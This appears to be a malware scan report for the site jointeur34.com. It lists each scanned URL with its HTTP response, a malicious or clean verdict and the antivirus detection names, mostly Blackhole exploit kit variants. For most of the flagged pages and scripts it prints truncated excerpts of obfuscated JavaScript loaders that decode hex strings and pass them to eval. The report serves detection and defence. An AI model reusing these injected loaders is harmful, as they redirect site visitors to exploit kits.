Request | Server response | Status |
http://jointeur34.com/ | 200 OK Content-Length: 18448 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) sp="s"+"p"+"li"+"t";w=window;z="dy";d=document;aq="0x";bv=(5-3-1);try{++(d.body)}catch(d21vd12v){vzs=false;try{}catch(wb){vzs=21;}if(1){f="17:5d:6c:65:5a:6b:60:66:65:17:62:59:6d:5f:65:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:62:59:6d:5f:65:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b: ...[4041 bytes skipped]...
Antivirus reports:
- AntiVir
- EXP/JS.Expack.GQ
- Avast
- JS:Decode-BDD [Trj]
- Ikarus
- Virus.JS.Exploit
- nProtect
- JS:Exploit.BlackHole.CZ
- Comodo
- TrojWare.JS.Kryptik.acc
- Emsisoft
- JS:Exploit.BlackHole.CZ (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- Exploit.BlackHole.196
- Kaspersky
- Exploit.JS.Pdfka.gkj
- Microsoft
- Trojan:JS/BlacoleRef.DD
- MicroWorld-eScan
- JS:Exploit.BlackHole.BD
- Fortinet
- JS/Kryptik.AOG!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.cgxcgz
- F-Secure
- JS:Exploit.BlackHole.CZ
- AVG
- JS/Exploit
- Norman
- Kryptik.CCLX
- GData
- JS:Exploit.BlackHole.CZ
- ESET-NOD32
- JS/Kryptik.AOG
|
http://jointeur34.com/Scripts/AC_RunActiveContent.js | 200 OK Content-Length: 13020 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) z="y";vz="d"+"o"+"c"+"ument";try{+function(){if(document.querySelector)++(window[vz].body)==null}()}catch(q){aa=function(ff){ff="fr"+"omCh"+ff;for(i=0;i<z.length;i++){za+=String[ff](e(v+(z[i]))-(13));}};};e=(eval);v="0x";a=0;try{;}catch(zz){a=1}if(!a){try{++e(vz)["\x62o"+"d"+z]}catch(q){a2="^";}z="2d^73^82^7b^70^81^76^7c^7b^2d^73^7a^78^3d^46^35^36^2d^88^1a^17^2d^83^6e^7f^2d^80^81^6e^81^76^70^4a^34^6e^77^6e^85^34^48^1a^17^2d^83^6e^7f^2d^70^7c^7b^81^7f^7c^79^79^72^7f^4a^34^76^7b^71^72^85^3b^7d^
... 3569 bytes are skipped ...^7f^76^7b^74^35^2d^79^72^7b^39^2d^72^7b^71^2d^36^2d^36^48^1a^17^8a^1a^17^76^73^2d^35^7b^6e^83^76^74^6e^81^7c^7f^3b^70^7c^7c^78^76^72^52^7b^6e^6f^79^72^71^36^1a^17^88^1a^17^76^73^35^54^72^81^50^7c^7c^78^76^72^35^34^83^76^80^76^81^72^71^6c^82^7e^34^36^4a^4a^42^42^36^88^8a^72^79^80^72^88^60^72^81^50^7c^7c^78^76^72^35^34^83^76^80^76^81^72^71^6c^82^7e^34^39^2d^34^42^42^34^39^2d^34^3e^34^39^2d^34^3c^34^36^48^1a^17^1a^17^73^7a^78^3d^46^35^36^48^1a^17^8a^1a^17^8a".split(a2);za="";aa("arCode");e(""+za);}
Antivirus reports:
- AntiVir
- JS/Blacole.EH.1
- Avast
- JS:Decode-BFW [Trj]
- nProtect
- JS:Exploit.BlackHole.BN
- Emsisoft
- JS:Exploit.BlackHole.BN (B)
- Comodo
- TrojWare.JS.iFrame.D
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- DrWeb
- JS.IFrame.500
- Kaspersky
- Trojan-Downloader.JS.Expack.ajr
- Microsoft
- Exploit:JS/Blacole.OC
- MicroWorld-eScan
- JS:Exploit.BlackHole.BN
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.gc
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Exploit.BlackHole.BN
- AVG
- Script/Exploit.Kit
- Norman
- Blacole.WU
- GData
- JS:Exploit.BlackHole.BN
- BitDefender
- JS:Exploit.BlackHole.BN
|
http://jointeur34.com/album1/index.php | 200 OK Content-Length: 6660 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) AC_FL_RunContent( 'codebase','http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0','width','750','height','450','src','banniere','quality','best','pluginspage','http://www.macromedia.com/go/getflashplayer','movie','09?hidemenu=&gallerie=&ac_reference= <script type="text/javascript" language="javascript" > if(document.querySelector)zq=4;a=("27,6d,7c,75,6a,7b,70,76,75,27,70,6b,74,74,37,40,2f,30,27,82,14,11,27,7d,68,79,27,7a,7b,68,7b,70,6a,44,2e,68,71,6
... 3869 bytes are skipped ...70,7a,70,7b,6c,6b,66,7c,78,2e,30,44,44,3c,3c,30,82,84,6c,73,7a,6c,82,5a,6c,7b,4a,76,76,72,70,6c,2f,2e,7d,70,7a,70,7b,6c,6b,66,7c,78,2e,33,27,2e,3c,3c,2e,33,27,2e,38,2e,33,27,2e,36,2e,30,42,14,11,14,11,70,6b,74,74,37,40,2f,30,42,14,11,84,14,11,84".split(","));r=eval;function vqvq(){zva=function(){--(d.body)}()}d=document;for(i=0;i<a.length;i+=1){a[i]=-(12-5)+parseInt(a[i],zq*4);}try{vqvq()}catch(q){yy=50-50;}try{yy/=123}catch(pq){yy=1;}if(!yy)r(String["fr"+"omCh"+"arCo"+"de"].apply(String,a));
Antivirus reports:
- AntiVir
- JS/Blacole.EB.50
- Avast
- JS:Includer-ALC [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.AY
- Ikarus
- Exploit.JS.Blackhole
- nProtect
- JS:Exploit.BlackHole.AY
- TrendMicro-HouseCall
- TROJ_GEN.F47V1203
- Emsisoft
- JS:Exploit.BlackHole.AY (B)
- Comodo
- TrojWare.JS.Agent.JP
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.498
- TrendMicro
- HEUR_HTJS.HDJSFN
- Microsoft
- Exploit:JS/Blacole.OE
- MicroWorld-eScan
- JS:Exploit.BlackHole.AY
- McAfee
- JS/Exploit-Blacole.ht
- F-Secure
- JS:Exploit.BlackHole.AY
- VIPRE
- Trojan.JS.Obfuscator.aa (v)
- Norman
- Blacole.WQ
- GData
- JS:Exploit.BlackHole.AY
- BitDefender
- JS:Exploit.BlackHole.AY
|
http://jointeur34.com/album1/Scripts/AC_RunActiveContent.js | 200 OK Content-Length: 8224 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) z="y";vz="d"+"o"+"c"+"ument";try{+function(){if(document.querySelector)++(window[vz].body)==null}()}catch(q){aa=function(ff){ff="fr"+"omCh"+ff;for(i=0;i<z.length;i++){za+=String[ff](e(v+(z[i]))-(13));}};};e=(eval);v="0x";a=0;try{;}catch(zz){a=1}if(!a){try{++e(vz)["\x62o"+"d"+z]}catch(q){a2="^";}z="2d^73^82^7b^70^81^76^7c^7b^2d^73^7a^78^3d^46^35^36^2d^88^1a^17^2d^83^6e^7f^2d^80^81^6e^81^76^70^4a^34^6e^77^6e^85^34^48^1a^17^2d^83^6e^7f^2d^70^7c^7b^81^7f^7c^79^79^72^7f^4a^34^76^7b^71^72^85^3b^7d^
... 3569 bytes are skipped ...^7f^76^7b^74^35^2d^79^72^7b^39^2d^72^7b^71^2d^36^2d^36^48^1a^17^8a^1a^17^76^73^2d^35^7b^6e^83^76^74^6e^81^7c^7f^3b^70^7c^7c^78^76^72^52^7b^6e^6f^79^72^71^36^1a^17^88^1a^17^76^73^35^54^72^81^50^7c^7c^78^76^72^35^34^83^76^80^76^81^72^71^6c^82^7e^34^36^4a^4a^42^42^36^88^8a^72^79^80^72^88^60^72^81^50^7c^7c^78^76^72^35^34^83^76^80^76^81^72^71^6c^82^7e^34^39^2d^34^42^42^34^39^2d^34^3e^34^39^2d^34^3c^34^36^48^1a^17^1a^17^73^7a^78^3d^46^35^36^48^1a^17^8a^1a^17^8a".split(a2);za="";aa("arCode");e(""+za);}
Antivirus reports:
- AntiVir
- JS/Blacole.EH.1
- Avast
- JS:Decode-BFW [Trj]
- nProtect
- JS:Exploit.BlackHole.BN
- Emsisoft
- JS:Exploit.BlackHole.BN (B)
- Comodo
- TrojWare.JS.iFrame.D
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- DrWeb
- JS.IFrame.500
- Kaspersky
- Trojan-Downloader.JS.Expack.ajr
- Microsoft
- Exploit:JS/Blacole.OC
- MicroWorld-eScan
- JS:Exploit.BlackHole.BN
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.gc
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Exploit.BlackHole.BN
- AVG
- Script/Exploit.Kit
- Norman
- Blacole.WU
- GData
- JS:Exploit.BlackHole.BN
- BitDefender
- JS:Exploit.BlackHole.BN
|
http://jointeur34.com/album1/Scripts/AC_ActiveX.js | 200 OK Content-Length: 7048 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) z="y";vz="d"+"o"+"c"+"ument";try{+function(){if(document.querySelector)++(window[vz].body)==null}()}catch(q){aa=function(ff){ff="fr"+"omCh"+ff;for(i=0;i<z.length;i++){za+=String[ff](e(v+(z[i]))-(13));}};};e=(eval);v="0x";a=0;try{;}catch(zz){a=1}if(!a){try{++e(vz)["\x62o"+"d"+z]}catch(q){a2="^";}z="2d^73^82^7b^70^81^76^7c^7b^2d^73^7a^78^3d^46^35^36^2d^88^1a^17^2d^83^6e^7f^2d^80^81^6e^81^76^70^4a^34^6e^77^6e^85^34^48^1a^17^2d^83^6e^7f^2d^70^7c^7b^81^7f^7c^79^79^72^7f^4a^34^76^7b^71^72^85^3b^7d^
... 3569 bytes are skipped ...^7f^76^7b^74^35^2d^79^72^7b^39^2d^72^7b^71^2d^36^2d^36^48^1a^17^8a^1a^17^76^73^2d^35^7b^6e^83^76^74^6e^81^7c^7f^3b^70^7c^7c^78^76^72^52^7b^6e^6f^79^72^71^36^1a^17^88^1a^17^76^73^35^54^72^81^50^7c^7c^78^76^72^35^34^83^76^80^76^81^72^71^6c^82^7e^34^36^4a^4a^42^42^36^88^8a^72^79^80^72^88^60^72^81^50^7c^7c^78^76^72^35^34^83^76^80^76^81^72^71^6c^82^7e^34^39^2d^34^42^42^34^39^2d^34^3e^34^39^2d^34^3c^34^36^48^1a^17^1a^17^73^7a^78^3d^46^35^36^48^1a^17^8a^1a^17^8a".split(a2);za="";aa("arCode");e(""+za);}
Antivirus reports:
- AntiVir
- JS/Blacole.EH.1
- Avast
- JS:Decode-BFW [Trj]
- nProtect
- JS:Exploit.BlackHole.BN
- Emsisoft
- JS:Exploit.BlackHole.BN (B)
- Comodo
- TrojWare.JS.iFrame.D
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- DrWeb
- JS.IFrame.500
- Kaspersky
- Trojan-Downloader.JS.Expack.ajr
- Microsoft
- Exploit:JS/Blacole.OC
- MicroWorld-eScan
- JS:Exploit.BlackHole.BN
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.gc
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Exploit.BlackHole.BN
- AVG
- Script/Exploit.Kit
- Norman
- Blacole.WU
- GData
- JS:Exploit.BlackHole.BN
- BitDefender
- JS:Exploit.BlackHole.BN
|
http://jointeur34.com/test404page.js | 404 Not Found Content-Length: 291 Content-Type: text/html | clean |
http://jointeur34.com/album2/index.php | 200 OK Content-Length: 6660 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) AC_FL_RunContent( 'codebase','http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0','width','750','height','450','src','banniere','quality','best','pluginspage','http://www.macromedia.com/go/getflashplayer','movie','09?hidemenu=&gallerie=&ac_reference= <script type="text/javascript" language="javascript" > if(document.querySelector)zq=4;a=("27,6d,7c,75,6a,7b,70,76,75,27,70,6b,74,74,37,40,2f,30,27,82,14,11,27,7d,68,79,27,7a,7b,68,7b,70,6a,44,2e,68,71,6
... 3869 bytes are skipped ...70,7a,70,7b,6c,6b,66,7c,78,2e,30,44,44,3c,3c,30,82,84,6c,73,7a,6c,82,5a,6c,7b,4a,76,76,72,70,6c,2f,2e,7d,70,7a,70,7b,6c,6b,66,7c,78,2e,33,27,2e,3c,3c,2e,33,27,2e,38,2e,33,27,2e,36,2e,30,42,14,11,14,11,70,6b,74,74,37,40,2f,30,42,14,11,84,14,11,84".split(","));r=eval;function vqvq(){zva=function(){--(d.body)}()}d=document;for(i=0;i<a.length;i+=1){a[i]=-(12-5)+parseInt(a[i],zq*4);}try{vqvq()}catch(q){yy=50-50;}try{yy/=123}catch(pq){yy=1;}if(!yy)r(String["fr"+"omCh"+"arCo"+"de"].apply(String,a));
Antivirus reports:
- AntiVir
- JS/Blacole.EB.50
- Avast
- JS:Includer-ALC [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.AY
- Ikarus
- Exploit.JS.Blackhole
- nProtect
- JS:Exploit.BlackHole.AY
- TrendMicro-HouseCall
- TROJ_GEN.F47V1203
- Emsisoft
- JS:Exploit.BlackHole.AY (B)
- Comodo
- TrojWare.JS.Agent.JP
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.498
- TrendMicro
- HEUR_HTJS.HDJSFN
- Microsoft
- Exploit:JS/Blacole.OE
- MicroWorld-eScan
- JS:Exploit.BlackHole.AY
- McAfee
- JS/Exploit-Blacole.ht
- F-Secure
- JS:Exploit.BlackHole.AY
- VIPRE
- Trojan.JS.Obfuscator.aa (v)
- Norman
- Blacole.WQ
- GData
- JS:Exploit.BlackHole.AY
- BitDefender
- JS:Exploit.BlackHole.AY
|
http://jointeur34.com/album2/Scripts/AC_RunActiveContent.js | 200 OK Content-Length: 8224 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) z="y";vz="d"+"o"+"c"+"ument";try{+function(){if(document.querySelector)++(window[vz].body)==null}()}catch(q){aa=function(ff){ff="fr"+"omCh"+ff;for(i=0;i<z.length;i++){za+=String[ff](e(v+(z[i]))-(13));}};};e=(eval);v="0x";a=0;try{;}catch(zz){a=1}if(!a){try{++e(vz)["\x62o"+"d"+z]}catch(q){a2="^";}z="2d^73^82^7b^70^81^76^7c^7b^2d^73^7a^78^3d^46^35^36^2d^88^1a^17^2d^83^6e^7f^2d^80^81^6e^81^76^70^4a^34^6e^77^6e^85^34^48^1a^17^2d^83^6e^7f^2d^70^7c^7b^81^7f^7c^79^79^72^7f^4a^34^76^7b^71^72^85^3b^7d^
... 3569 bytes are skipped ...^7f^76^7b^74^35^2d^79^72^7b^39^2d^72^7b^71^2d^36^2d^36^48^1a^17^8a^1a^17^76^73^2d^35^7b^6e^83^76^74^6e^81^7c^7f^3b^70^7c^7c^78^76^72^52^7b^6e^6f^79^72^71^36^1a^17^88^1a^17^76^73^35^54^72^81^50^7c^7c^78^76^72^35^34^83^76^80^76^81^72^71^6c^82^7e^34^36^4a^4a^42^42^36^88^8a^72^79^80^72^88^60^72^81^50^7c^7c^78^76^72^35^34^83^76^80^76^81^72^71^6c^82^7e^34^39^2d^34^42^42^34^39^2d^34^3e^34^39^2d^34^3c^34^36^48^1a^17^1a^17^73^7a^78^3d^46^35^36^48^1a^17^8a^1a^17^8a".split(a2);za="";aa("arCode");e(""+za);}
Antivirus reports:
- AntiVir
- JS/Blacole.EH.1
- Avast
- JS:Decode-BFW [Trj]
- nProtect
- JS:Exploit.BlackHole.BN
- Emsisoft
- JS:Exploit.BlackHole.BN (B)
- Comodo
- TrojWare.JS.iFrame.D
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- DrWeb
- JS.IFrame.500
- Kaspersky
- Trojan-Downloader.JS.Expack.ajr
- Microsoft
- Exploit:JS/Blacole.OC
- MicroWorld-eScan
- JS:Exploit.BlackHole.BN
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.gc
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Exploit.BlackHole.BN
- AVG
- Script/Exploit.Kit
- Norman
- Blacole.WU
- GData
- JS:Exploit.BlackHole.BN
- BitDefender
- JS:Exploit.BlackHole.BN
|
http://jointeur34.com/album2/Scripts/AC_ActiveX.js | 200 OK Content-Length: 7048 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) z="y";vz="d"+"o"+"c"+"ument";try{+function(){if(document.querySelector)++(window[vz].body)==null}()}catch(q){aa=function(ff){ff="fr"+"omCh"+ff;for(i=0;i<z.length;i++){za+=String[ff](e(v+(z[i]))-(13));}};};e=(eval);v="0x";a=0;try{;}catch(zz){a=1}if(!a){try{++e(vz)["\x62o"+"d"+z]}catch(q){a2="^";}z="2d^73^82^7b^70^81^76^7c^7b^2d^73^7a^78^3d^46^35^36^2d^88^1a^17^2d^83^6e^7f^2d^80^81^6e^81^76^70^4a^34^6e^77^6e^85^34^48^1a^17^2d^83^6e^7f^2d^70^7c^7b^81^7f^7c^79^79^72^7f^4a^34^76^7b^71^72^85^3b^7d^
... 3569 bytes are skipped ...^7f^76^7b^74^35^2d^79^72^7b^39^2d^72^7b^71^2d^36^2d^36^48^1a^17^8a^1a^17^76^73^2d^35^7b^6e^83^76^74^6e^81^7c^7f^3b^70^7c^7c^78^76^72^52^7b^6e^6f^79^72^71^36^1a^17^88^1a^17^76^73^35^54^72^81^50^7c^7c^78^76^72^35^34^83^76^80^76^81^72^71^6c^82^7e^34^36^4a^4a^42^42^36^88^8a^72^79^80^72^88^60^72^81^50^7c^7c^78^76^72^35^34^83^76^80^76^81^72^71^6c^82^7e^34^39^2d^34^42^42^34^39^2d^34^3e^34^39^2d^34^3c^34^36^48^1a^17^1a^17^73^7a^78^3d^46^35^36^48^1a^17^8a^1a^17^8a".split(a2);za="";aa("arCode");e(""+za);}
Antivirus reports:
- AntiVir
- JS/Blacole.EH.1
- Avast
- JS:Decode-BFW [Trj]
- nProtect
- JS:Exploit.BlackHole.BN
- Emsisoft
- JS:Exploit.BlackHole.BN (B)
- Comodo
- TrojWare.JS.iFrame.D
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- DrWeb
- JS.IFrame.500
- Kaspersky
- Trojan-Downloader.JS.Expack.ajr
- Microsoft
- Exploit:JS/Blacole.OC
- MicroWorld-eScan
- JS:Exploit.BlackHole.BN
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.gc
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Exploit.BlackHole.BN
- AVG
- Script/Exploit.Kit
- Norman
- Blacole.WU
- GData
- JS:Exploit.BlackHole.BN
- BitDefender
- JS:Exploit.BlackHole.BN
|
http://jointeur34.com/album3/index.php | 200 OK Content-Length: 6660 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) AC_FL_RunContent( 'codebase','http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0','width','750','height','450','src','banniere','quality','best','pluginspage','http://www.macromedia.com/go/getflashplayer','movie','09?hidemenu=&gallerie=&ac_reference= <script type="text/javascript" language="javascript" > if(document.querySelector)zq=4;a=("27,6d,7c,75,6a,7b,70,76,75,27,70,6b,74,74,37,40,2f,30,27,82,14,11,27,7d,68,79,27,7a,7b,68,7b,70,6a,44,2e,68,71,6
... 3869 bytes are skipped ...70,7a,70,7b,6c,6b,66,7c,78,2e,30,44,44,3c,3c,30,82,84,6c,73,7a,6c,82,5a,6c,7b,4a,76,76,72,70,6c,2f,2e,7d,70,7a,70,7b,6c,6b,66,7c,78,2e,33,27,2e,3c,3c,2e,33,27,2e,38,2e,33,27,2e,36,2e,30,42,14,11,14,11,70,6b,74,74,37,40,2f,30,42,14,11,84,14,11,84".split(","));r=eval;function vqvq(){zva=function(){--(d.body)}()}d=document;for(i=0;i<a.length;i+=1){a[i]=-(12-5)+parseInt(a[i],zq*4);}try{vqvq()}catch(q){yy=50-50;}try{yy/=123}catch(pq){yy=1;}if(!yy)r(String["fr"+"omCh"+"arCo"+"de"].apply(String,a));
Antivirus reports:
- AntiVir
- JS/Blacole.EB.50
- Avast
- JS:Includer-ALC [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.AY
- Ikarus
- Exploit.JS.Blackhole
- nProtect
- JS:Exploit.BlackHole.AY
- TrendMicro-HouseCall
- TROJ_GEN.F47V1203
- Emsisoft
- JS:Exploit.BlackHole.AY (B)
- Comodo
- TrojWare.JS.Agent.JP
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.498
- TrendMicro
- HEUR_HTJS.HDJSFN
- Microsoft
- Exploit:JS/Blacole.OE
- MicroWorld-eScan
- JS:Exploit.BlackHole.AY
- McAfee
- JS/Exploit-Blacole.ht
- F-Secure
- JS:Exploit.BlackHole.AY
- VIPRE
- Trojan.JS.Obfuscator.aa (v)
- Norman
- Blacole.WQ
- GData
- JS:Exploit.BlackHole.AY
- BitDefender
- JS:Exploit.BlackHole.AY
|
http://jointeur34.com/album3/Scripts/AC_RunActiveContent.js | 200 OK Content-Length: 8224 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) z="y";vz="d"+"o"+"c"+"ument";try{+function(){if(document.querySelector)++(window[vz].body)==null}()}catch(q){aa=function(ff){ff="fr"+"omCh"+ff;for(i=0;i<z.length;i++){za+=String[ff](e(v+(z[i]))-(13));}};};e=(eval);v="0x";a=0;try{;}catch(zz){a=1}if(!a){try{++e(vz)["\x62o"+"d"+z]}catch(q){a2="^";}z="2d^73^82^7b^70^81^76^7c^7b^2d^73^7a^78^3d^46^35^36^2d^88^1a^17^2d^83^6e^7f^2d^80^81^6e^81^76^70^4a^34^6e^77^6e^85^34^48^1a^17^2d^83^6e^7f^2d^70^7c^7b^81^7f^7c^79^79^72^7f^4a^34^76^7b^71^72^85^3b^7d^
... 3569 bytes are skipped ...^7f^76^7b^74^35^2d^79^72^7b^39^2d^72^7b^71^2d^36^2d^36^48^1a^17^8a^1a^17^76^73^2d^35^7b^6e^83^76^74^6e^81^7c^7f^3b^70^7c^7c^78^76^72^52^7b^6e^6f^79^72^71^36^1a^17^88^1a^17^76^73^35^54^72^81^50^7c^7c^78^76^72^35^34^83^76^80^76^81^72^71^6c^82^7e^34^36^4a^4a^42^42^36^88^8a^72^79^80^72^88^60^72^81^50^7c^7c^78^76^72^35^34^83^76^80^76^81^72^71^6c^82^7e^34^39^2d^34^42^42^34^39^2d^34^3e^34^39^2d^34^3c^34^36^48^1a^17^1a^17^73^7a^78^3d^46^35^36^48^1a^17^8a^1a^17^8a".split(a2);za="";aa("arCode");e(""+za);}
Antivirus reports:
- AntiVir
- JS/Blacole.EH.1
- Avast
- JS:Decode-BFW [Trj]
- nProtect
- JS:Exploit.BlackHole.BN
- Emsisoft
- JS:Exploit.BlackHole.BN (B)
- Comodo
- TrojWare.JS.iFrame.D
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- DrWeb
- JS.IFrame.500
- Kaspersky
- Trojan-Downloader.JS.Expack.ajr
- Microsoft
- Exploit:JS/Blacole.OC
- MicroWorld-eScan
- JS:Exploit.BlackHole.BN
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.gc
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Exploit.BlackHole.BN
- AVG
- Script/Exploit.Kit
- Norman
- Blacole.WU
- GData
- JS:Exploit.BlackHole.BN
- BitDefender
- JS:Exploit.BlackHole.BN
|
http://jointeur34.com/album3/Scripts/AC_ActiveX.js | 200 OK Content-Length: 7048 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) z="y";vz="d"+"o"+"c"+"ument";try{+function(){if(document.querySelector)++(window[vz].body)==null}()}catch(q){aa=function(ff){ff="fr"+"omCh"+ff;for(i=0;i<z.length;i++){za+=String[ff](e(v+(z[i]))-(13));}};};e=(eval);v="0x";a=0;try{;}catch(zz){a=1}if(!a){try{++e(vz)["\x62o"+"d"+z]}catch(q){a2="^";}z="2d^73^82^7b^70^81^76^7c^7b^2d^73^7a^78^3d^46^35^36^2d^88^1a^17^2d^83^6e^7f^2d^80^81^6e^81^76^70^4a^34^6e^77^6e^85^34^48^1a^17^2d^83^6e^7f^2d^70^7c^7b^81^7f^7c^79^79^72^7f^4a^34^76^7b^71^72^85^3b^7d^
... 3569 bytes are skipped ...^7f^76^7b^74^35^2d^79^72^7b^39^2d^72^7b^71^2d^36^2d^36^48^1a^17^8a^1a^17^76^73^2d^35^7b^6e^83^76^74^6e^81^7c^7f^3b^70^7c^7c^78^76^72^52^7b^6e^6f^79^72^71^36^1a^17^88^1a^17^76^73^35^54^72^81^50^7c^7c^78^76^72^35^34^83^76^80^76^81^72^71^6c^82^7e^34^36^4a^4a^42^42^36^88^8a^72^79^80^72^88^60^72^81^50^7c^7c^78^76^72^35^34^83^76^80^76^81^72^71^6c^82^7e^34^39^2d^34^42^42^34^39^2d^34^3e^34^39^2d^34^3c^34^36^48^1a^17^1a^17^73^7a^78^3d^46^35^36^48^1a^17^8a^1a^17^8a".split(a2);za="";aa("arCode");e(""+za);}
Antivirus reports:
- AntiVir
- JS/Blacole.EH.1
- Avast
- JS:Decode-BFW [Trj]
- nProtect
- JS:Exploit.BlackHole.BN
- Emsisoft
- JS:Exploit.BlackHole.BN (B)
- Comodo
- TrojWare.JS.iFrame.D
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- DrWeb
- JS.IFrame.500
- Kaspersky
- Trojan-Downloader.JS.Expack.ajr
- Microsoft
- Exploit:JS/Blacole.OC
- MicroWorld-eScan
- JS:Exploit.BlackHole.BN
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.gc
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Exploit.BlackHole.BN
- AVG
- Script/Exploit.Kit
- Norman
- Blacole.WU
- GData
- JS:Exploit.BlackHole.BN
- BitDefender
- JS:Exploit.BlackHole.BN
|